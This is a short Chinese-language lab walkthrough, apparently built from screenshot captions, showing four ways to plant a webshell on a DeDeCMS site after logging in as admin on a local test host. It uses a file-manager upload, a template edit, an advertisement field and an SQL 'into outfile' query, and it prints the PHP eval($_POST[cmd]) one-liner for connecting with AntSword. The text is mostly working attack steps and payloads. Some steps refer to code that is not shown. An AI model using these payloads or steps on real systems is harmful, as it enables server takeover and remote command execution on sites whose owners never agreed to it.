DeDeCMS
环境部署
同意协议
环境检测
参数配置
漏洞复现
姿势⼀:通过⽂件管理器上传WebShell
#前台
http://192.168.4.139/dedecms/index.php?upcache=1
#后台
http://192.168.4.139/dedecms/dede/
#信息
username:admin
password:admin
上传文件
成功上传
文件内容
<?php phpinfo();@eval($_POST[cmd]);?>
蚁剑连接getshell
姿势⼆:修改模板⽂件拿WebShell
找到默认模板下的index.html
并修改代码,修改如下
点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》 点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化..
页面如下
使用蚁剑进行连接
姿势三:后台任意命令执⾏拿WebShell
点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添 加⼀句话代码--》点击 【确定】
广告内容如下
<?php phpinfo();@eval($_POST[cmd]);?>
点击代码找到广告路径
访问路径
用蚁剑连接
姿势四:sql命令行执行拿webshell
找到系统-sql命令行执行工具
sql语句
select "<?php phpinfo();@eval($_POST[cmd]);" into outfile "E:/phpstudy_pro/WWW/DedeCMS/uploads/shell.php" 
查看文件
用蚁剑连接
